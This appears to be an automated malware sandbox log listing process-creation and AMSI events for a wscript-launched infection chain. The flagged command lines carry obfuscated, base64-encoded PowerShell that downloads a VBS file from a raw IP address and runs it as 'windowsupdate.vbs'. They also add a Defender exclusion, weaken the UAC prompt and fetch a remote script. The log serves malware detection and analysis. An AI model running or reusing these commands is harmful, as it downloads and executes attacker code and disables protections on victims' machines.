                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('QM', $false). DefineType('QT', 'Class,
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYj
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('QM', $false). DefineType('QT', 'Class,
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYj
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('QM', $false). DefineType('QT', 'Class,
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYj
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('QM', $false). DefineType('QT', 'Class,
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYj
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('QM', $false). DefineType('QT', 'Class,
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYj
                  PowerShell case anomaly found
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"Jump to behavior
                  Suspicious command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDa